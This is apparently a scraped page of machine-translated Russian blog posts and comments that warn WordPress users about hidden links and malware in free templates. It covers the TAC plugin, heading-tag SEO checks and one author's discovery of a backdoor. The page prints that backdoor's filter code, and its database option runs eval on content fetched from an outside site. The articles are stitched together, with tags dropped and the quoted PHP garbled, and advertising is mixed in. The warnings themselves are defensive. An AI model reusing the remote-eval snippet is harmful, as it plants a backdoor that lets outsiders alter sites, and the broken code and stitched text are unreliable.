A large number of free themes and templates have been created under the WordPress engine. All we have to do is find the right template, download it and install it on our blog. Actually, this is how many novice webmasters do. At the same time, they do not think at all that these templates may be unsafe for their future site. Templates are often created ordinary users engine WordPress.

Some creators place a bunch of external links in templates that can lead to very dubious sites. For example, the template contains a large number of links to sexual resources. Externally, these links will not be visible. However search robot it will index them anyway and give these sites a part of your citation index. In addition, various sanctions can be applied to your resource (if there are too many links to suspicious sites). The question arises - what to do with such free templates? By the way, paid templates also, not infrequently, sin by having hidden links.

How to check a template for external links?

A plugin called TAC (the abbreviation stands for Theme Authenticity Checker) will help you check the template for the presence of external links hidden in it. You can download it from following link on the official WordPress site. This plugin is completely free and easy to install and use.

After activating TAC, you need to go to its parameters, located along the following path - "Appearance" - "TAC". There you can see the scan results of all the themes that are installed on your blog. If everything is OK with the theme, then next to its name there will be a green rectangle with the inscription "Theme OK!".

It should be remembered that this inscription means the absence of any encoded links. All other external links will be listed below. Carefully study these links and check where they lead. As a rule, each template has a link to the site of its creator. Usually this link is visible to blog visitors and is located in the footer.

Among webmasters, it is customary not to remove such links, because this is a kind of tribute to the author of the template, who made it for you for free. If the template contains links to some other sites, then it is better to delete them. You can do this with the help of opening the required template file.

I will end with this. Good luck to you! until the next articles.
With great respect,

Liked the article? Subscribe to blog news or share on social networks, and I will answer you

3 comments on the post “TAC plugin or how to check a template for external links”

I scanned the template for them and it showed - ok. Although something adds a link to wp-load.php. What else do you recommend?

There are a lot of free website templates on the Internet. That free cheese it happens only in a mousetrap, everyone knows and still the hand reaches out to download such a free and install it on your website.

Before installing a free template, it would not hurt to check it for hidden links.

By putting a free template, many do not even assume that they simply cannot promote and earn money on such a site.

In one such template, there can be several links at once. It’s also good if the nested links are to a site similar to your subject, and not to sites for adults. And there will be only two or three of them, not dozens.

How does installing such a free template threaten your site? The site will fall under the filter, getting out of which is almost impossible. A site under filters is a dead site!
Installing a free template on your site is like playing Russian roulette. Only the chance to install a completely clean template is zero.

At best, you will get 3-5 left links on your site. You can, of course, try to clean up such a template, but there are craftsmen who enter links into the template in such a way that they cannot be removed from there (the template is broken, it just warps).

To be honest, it’s easier to order a new clean and unique (which can’t be said about free) template, it will cost less.

For example, I charge 200 rubles for creating a template (write to Skype: oxamitta). Tell me, is it worth it? Take free and lose the site, but save 200 rubles? Wow savings!!!

But what if you have already bet on a free template? How to check a template for hidden links?

There is a special plugin for this. It will not help to remove these links, but to identify them - please.

Perhaps not everything is so scary and your template has only a couple of external links! Do you want to test the template? Then download the plugin from the link below (to see the link to download the plugin, click on one of the buttons of social networks).

The plugin is installed in the site admin panel in the standard way. It makes no sense to shoot about this video, so today we will manage with a couple of screenshots.

Install the plugin and activate.

To enlarge the screenshot, click on it with the left mouse button.


Go to the tab Appearance, TAS.



After you have chosen a template to install on your WordPress site, it is worth checking its layout for compliance with the basic rules of SEO (optimization). For example, the box template "Twenty Fourteen" is laid out so that the titles of the widgets are displayed in the tags

, which may adversely affect the promotion of the site. There are other shortcomings in the layout of templates that need to be eliminated before filling the site with materials and opening it for search engines.

Extremely difficult to find ready wordpress template fully meet your needs. Quite often, you like the selected template, but do not like its color scheme or do not like the location of the sidebar, header, font, etc. On the WP platform, there is every opportunity to change the WordPress template for yourself.

For example, let's modify a boxed WordPress template called "Twenty Fourteen". This template will be a practical example where you can see all the nuances of fine and not only fine tuning WordPress templates.



Preparing to Edit a Template

Before any work with WordPress code, including changing the working template, you need to do and have at hand:

• (catalog and database) ;
• A backup copy of the working (edited) template.

The template must be preconfigured on the Appearance→Customize tab.

Note: To make non-resettable changes to a template, you need to switch to . Work on the child WordPress theme allows you to update the template without losing your changes.

How to Customize Twenty Fourteen WordPress Theme

I will try to show the principle of changing the template, which will allow you to make your own changes to any WordPress template.

So the task is: There is a template "Twenty Fourteen" photo 1, we make user changes in the template, at the same time, we check the layout of the template for compliance with the rules SEO optimization.

Note: I note that the authors of many templates create reconfigurable settings for their template by displaying the settings interface on a separate tab. Working with such templates, you can easily set custom template settings without changing the template code. This is not the option described in this article.

Checking the layout of the template for SEO rules

Let's deal with the layout of the template first. Before checking, we set the provided template settings.

To check the layout for compliance with SEO rules, we need:

• Place any widget on the sidebar(s) of the template. Let it be a calendar. Be sure to give the widget a name.
• Create test page and test site post.

Steps for Checking Template Layout for SEO Rules

Step 1. Checking the main page

1. Open the home page of the site. Any browser has developer tools. Simple tool management is found on right button mouse, for Chrome browser "View code". 2. On home page site (page of the last records) we look at the code on the title of the site. If it is text, then it should be in h1 tags. If it's an image, then it should NOT be in h1 tags.

Important! No page on your site should have more than two h1 tags. One opening

, the second closing

.
3. In order not to “poke” all the headings on the page, on the right mouse button we look at the “Page code” and, having opened the search on the page (ctrl + F buttons), we are looking for “h1”. If the search finds more than two h1 tags, look at what they frame and try to fix it. Correction below.
template layout check 4. Announcements of articles, in our example this is one test article. The announcement title should be in h2 tags. If the titles of article announcements in h1 or h3 tags need to be corrected. Correction below. 5. All widget titles must be in h3 or h4 tags. This site is laid out so that widget titles are wrapped in tags

, this needs to be corrected. Correction below.

I repeat! No page on your site should have more than two h1 tags. One opening

, the second closing

.

Step 2: Testing the Test Post Page

After the main page of the site, open the test post of the site. Here we check that only the title of the post is wrapped in h1 tags. We do the check in the same way as the site post. It is necessary that h1 tags wrap only the title of the page.



Step 3Viding Widgets

Similarly, look at the widget title tags in the sidebar and footer.


widget template layout check



Layout check results

As a result of checking the layout of the template, on this template, we found that the headers of the widgets in the footer and sidebar of the site are wrapped in h1 tags. It needs to be fixed.

1. To fix it, go to the template directory and open the functions.php file for editing. By the words “go to the template directory”, we mean copying the desired file (you can from the console editor) and editing it in text editor like Notepad++. 2. In the functions.php file, look for how widgets are displayed in the template. For this template, we see that the widget titles in the h1. Change h1 to h3. 3. If the widget header type is not set in the functions.php file, go to the footer.php file and see how the header of the widgets in the footer is wrapped in this file. Change h1 to h3.

If we found that home page article announcements are displayed in h1 tags, that is, on the page of recent posts, there are several headings in h1, we read the article and eliminate this SEO layout error.

The topic of the article turned out to be more than I expected, so I will have to change the WordPress template for myself, namely, change it appearance, will be in the next article. Beforehand, you can read the articles: Layout Rules for the WordPress Cascading Styles File.

Hello friends. Are you sure that the free WordPress template that you use for your websites and blogs is really safe and does not contain hidden threats and malicious code? Are you completely sure of this? Absolutely?)

You think they ran the template through, removed hidden links from it, and it's done. You periodically scan the site files with an antivirus, look into the Yandex webmaster tools in the Security tab and, with relief, you see a message there: “ No malicious code found on the site«.

That's what I thought too. I don't want to upset you, but...

Hidden Dangerous Code in Free WordPress Themes

This is the letter I received last week in the mail from my hosting. Recently, they have introduced a regular check of all site files for malicious content, and yet they found this content in me!

It all started with the fact that one day I went to my site and could not launch it - an abusive inscription about not found files with the php extension came out. Having tensed a little, I went to study the contents of the folder with the site on the hosting and immediately discovered a problem - my fuctions.php template file was renamed to functions.php.malware, which, as it were, ambiguously hinted - an antivirus or something like that worked here) Having entered the mail, I and found the above report from the hoster.

The first thing I did, of course, was to check given file, studied its contents, scanned it with various antiviruses, dozens of online services for checking for viruses, etc. - in the end, I didn’t find anything, everyone unanimously claimed that the file was completely safe. Of course, I expressed my doubts to the hoster, saying that you messed up something, but just in case, I asked them to provide a report on the discovery of a malicious piece of code.

And this is what they told me



I went to google information about this code and seriously thought about it ...

How to find a piece of malicious code in a template

As it turned out, this is a really non-trivial trick that allows interested parties to transfer data to your site and change the content of pages without your knowledge! If you are using a free template, then I highly recommend checking your functions.php for the following code:

add_filter('the_content', '_bloginfo', 10001);
function _bloginfo($content)(
global $post;
if(is_single() && ( [email protected](get_option('blogoption'))) !== false)(
return $co;
) else return $content;
}

Even with my very shallow knowledge of php, it can be seen that a certain filter is being created that is tied to the global variable post and content, which are responsible for displaying content only on blog post pages (is_single condition). Already suspicious isn't it? Well, now let's see what this is going to display given code on our website.

The interesting blogoption requested in the database also looks very suspicious. We go to our base MySQL data and we find there a table called wp_options, if you did not change the prefixes, then it will look like this by default. And in it we find a line of interest to us called blogoption



What a beauty! We see the following option


return eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));


Those. us from a certain site (moreover, Russian, mind you) return content that can carry anything! Any number of links, malicious codes, altered text, etc. The site itself, when accessing it, gives out a 403 access error, which is not surprising. Of course, I also removed this option from the database.

According to the information from the victims, exactly the content of your article is usually returned with only one modification - instead of any dot "." an open link was masked in the text! And by the way, this option is written to the database when the template itself is installed, and then the code that does this safely self-destructs. And I lived with such rubbish for two years, and not a single antivirus or service revealed it to me this threat for all that time. To be honest, I didn’t notice if this technique ever worked for me, or if my security plugin blocked this possibility (or maybe one of the WordPressa updates closed this hole), but it’s still unpleasant.

Moral of the free cheese

How do you like the sophistication of our "translators" of templates (or those who post them in their catalogs)? It’s not for you to cut out links from the footer) It’s a pity I don’t remember where I downloaded my template from, it was a long time ago, otherwise I would have written a couple of affectionate ones. And if at that time I had the same experience that I have now, then I would definitely not use a free template, or, in extreme cases, would not download from unknown sources!

It’s easier to buy some official premium template for 15-20 bucks on the same one and live in peace, knowing that there are no holes and encrypted links in it, and even if there are vulnerabilities, the developers will definitely release an update in which these holes will be closed. ( By the way, Artem recently published an article where he just talks about premium templates and even distributes promotional codes for brutal discounts for those who are interested)

Hello, dear readers of the blog site. Now there are few webmasters who make up their site themselves (on pure Html, their own engine, or at least use hand-made templates for CMS). In general, this is true, because not everyone is able to create something worthwhile - here you need the talent of a designer. Most often it comes out at least “not very”, and sometimes “just awful”.

Therefore, templates or themes (in different engines, “skins” can be denoted by different terms) for popular CMS have become so widespread. Especially a lot of this goodness can be found on the Internet for Joomla and WordPress, because it is rightfully, both in Runet and in the bourgeoisie.

Actually, only Russian-language resources with catalogs of ready-made templates can already be counted quite a lot. Well, in the bourgeoisie they can’t be counted at all. Everything seems to be so wonderful - install the engine, find a suitable template (it's no secret that paid templates are not so difficult to find in free access), download it and enjoy the professional design of your brand new website. All that remains is to add valuable content to it and you will be able to observe the growth in popularity of your resource on the network.

But not everything is so simple and obvious. When I wrote an article a long time ago, I received recommendations from readers by mail quite regularly to remove this or that service from the list, because in the templates find hidden links or even viruses. It turns out that the proverb is not lying - free cheese is only in a mousetrap. Developers of free templates (or those who "zero" paid ones) simply make money this way and, judging by the scope, a lot.

Hidden links to third-party (and often blacklisted by search engines) resources, and even more so viruses, can kill all hopes for the promotion of your resource (or seriously undermine them and ruin your nerves). For this, you can either. How to protect yourself from all this when choosing a template?

What's wrong with free templates for Joomla and WordPress?

From my own experience, I can say that it is very difficult for an “amateur” to compete with a “professional”. At the very beginning of this publication, I provided a link to an article about viruses that infected most of my sites. This happened more than two years ago, and during this time I have repeatedly repeated the epic struggle for the "cleanliness of the code", but relapses still occur with enviable regularity on a number of infected resources (either spam is being sent from them, then a doorway is being formed, then something else completely incomprehensible to me is happening, leading to a monstrously large load on the hosting).

At the same time, I use all the methods available to the “noob” to search for shells and other backdoors in the code of these sites, but again, I repeat that the amateur simply cannot compete with the pros. Therefore, if you think that you can easily remove a virus that has crept through the template, then most likely you are mistaken. This case is very dreary, terribly annoying (when viral activity, despite all your efforts, appears again and again) and takes a lot of time and effort.

The same also applies to hidden links. It’s good if you come across a version of their implementation from a past era, when it will be easy to find the place of insertion and get rid of them forever, resulting in a clean and free template. In most cases, everything is much more complicated. To find a place to insert hidden links, you will need software (for example, the TAC plugin), but it is not omnipotent, because the business of distributing links through free and paid (hacked) templates for Joomla and WordPress brings a very good income, which encourages people who practice it to search new solutions to make their "bookmark" hardly noticeable.

Actually, today it is quite difficult to even quickly check a template for generating “left links”. For example, you downloaded a template, put it on the site, added content and decided to see if any suspicious (not put down by you) external links appeared from it. There is none of them. You are happy, forget about this problem, fill the site and promote it, and then suddenly discover (by yourself or after a signal from search engines in the form of a filter or a ban) that there are still hidden links and they lead to such "muck", to which you yourself would never have thought to refer to.

The most annoying thing is that to remove the filter and “whitewash” the site in the eyes of search engines can take a very long time (months and even years in some cases). And the point here is that the developers of such “bookmarks” are aware of what you know about them and check the site after installing the template for “any bad excesses”. Therefore, they slow down the beginning of the generation of these very links for some time, which, in their opinion, is sufficient for even the most suspicious user to believe in the purity of the template he got for free.

Moreover, hidden links are now encoded in such a way that they are not searched for by md5 or base64 words (often they are loaded in general from an external source). Just a set of letters and special characters that cannot be found in any way through a search in all template files. And these files can be more than one hundred. Plus, links do not appear immediately. That is, in fact, it is impossible for a webmaster (average) to detect them at the stage of creating a site.

Well, in order to avoid infection through the template, I I prefer to pay so as not to rake up a pile of problems later. Another thing is that you can pay a lot of money, or you can not pay very much. I personally choose the second option, but first I will explain the essence of the first.

Something, of course, can be found and in the official repositories of these engines(read about that and go to the official website of extensions for Joomla), but, firstly, the choice there is significantly limited, and secondly, many thousands more sites around the world will be wearing the same “clothes”, which somewhat reduces the uniqueness of your project both in the eyes of visitors and in the eyes of search engines.

However, there are many professional companies in the world that develop paid templates for Joomla and WordPress. A priori (), they should not have bookmarks, otherwise they will instantly lose the credibility and trust of customers. However, the price for one template can be 50-100 dollars, depending on its functionality and novelty.

In addition, there may be some problems with payment (you will either have to take a chance and make a purchase with payment directly from a plastic card). However, as a result, you will get a deliberately “clean” template, which is good. True, the technical support that comes with it will be relevant only if you know the language in which it is carried out. In most cases, knowledge of the Russian language will not help you in this matter.

I like the second option more because of its higher profitability (the ratio of money spent to opportunities received), although in relation to developers it is not entirely “white”. Its essence lies in the fact that Joomla and WordPress distributed under a GNU/GPL type license, i.e. licenses for free software(Such software may be used, copied, modified and distributed). Actually, I already wrote about this earlier in the article about Joomla templates mentioned at the very beginning.

Without going into too much detail, the bottom line is that extensions (templates, plug-ins, etc.) for these engines cannot be the private property of the authors. Yes, you can charge a fee for them, but it will no longer be possible to punish or prosecute for unauthorized use or distribution of these extensions. Despite this, the market for paid extensions for Joomla and WordPress is huge, although not protected by copyright law. On the contrary, the GNU/GPL license 100% protects you from the developer.

Many developer companies, by the way, provide access to their templates by subscription. Those. you pay a certain amount and within a certain time can download and continue to use all their creations (templates or extensions) on an ongoing basis. Actually, the second way to securely obtain themes for WordPress, as well as templates for Joomla, is based on approximately the same principle.

“Showed me the finger” not so long ago, my friend, whom I mentioned in a number of articles (he has been looking for the ideal option for building an online store for several years, and along the way he finds a lot of things that seem interesting to me and are actively used in the future) . We are talking about a bunch of premium templates and extensions. CmsHeaven.org .

The essence of the clubbing is quite simple - buy a product and distribute it to everyone who participated in the clubbing. CmsHeaven.org has simplified the scheme even more - there is no need to chip in for separate templates or extensions that you need. You simply pay for temporary access to the entire catalog that this service has at its disposal (several thousand titles, broken down by engines, authors and topics for ease of searching).

Each of the presented products was honestly bought from the developers with the money of warehouses (there are also free templates, but again they are presented by well-known brands that they need for advertising purposes). And what is important, the organizers constantly replenish the catalog with new copies (piping hot, as they say), which will have to wait for a long time in public. Many people will like it.



In general, such a cooperative, where you can join and enjoy all the benefits. But with some restrictions. The fact is that the organizers are well aware that without the introduction of restrictions, their entire catalog will leak into the public for one or two. Therefore, there is a place limit of 36 downloads per month. This is quite enough for an ordinary webmaster, and even for a website development company.

At the same time, it is guaranteed absence in the presented extensions and templates "bookmarks"(hidden links, viruses, trojans and "snitchers" that inform the developer about the site using their template). In view of this, only products of well-known brands with open source are bought, where you can check all this and, if necessary, fix it.

Some of the extensions have been translated into Russian, and if there are problems with installation or configuration, which is often necessary (probably, the Internet has been combed more than once in search of a solution to a problem that has arisen out of the blue). By the way, this is what distinguishes free engines from paid ones, that there is no user support as such.

Yes, and you can download the products you like at a normal speed and without viewing ads on file hosting. A trifle, because to get the coveted "nyashki" you can move mountains, and not only fight with a file hosting service, but comfort is made up of trifles.

In general, I really liked the idea and its implementation, but whether to use free templates from the Joomla and WordPress repositories, whether to join the pool on CmsHeaven.org or buy templates directly from developers you will have to decide for yourself. Only “I beg you, do not eat raw tomatoes at night”, that is, do not download free products from any “wonderful” resources, because you can get a lot of problems in the load. Do you need it?

Good luck to you! See you soon on the blog pages site

You may be interested

How to insert the hit counter code into a Joomla site through the Custom HTML code module or directly into the template
How to create a professional business card site yourself without knowledge of Html, CSS and PHP? Answer: MotoCMS!
How to get responsive template for the future site, and with it an intuitive and nimble CMS to boot
10 deadly mistakes when writing and publishing articles
Creating a menu item in Joomla to enter the forum and transferring user registration from SMF to the site
Setting up JFusion to merge the SMF forum and Joomla site
JFusion modules for displaying messages from the forum on the site, as well as creating a button in SMF to return to Joomla WebPoint PRO is a responsive WordPress theme with wide functionality and competent technical search engine optimization
Share42 - script for adding buttons to the site social networks and bookmarks (there is a floating panel option)
Installing the SMF Forum - Integrating Joomla 1.5 and Simple Machines Forum Using the JFusion Component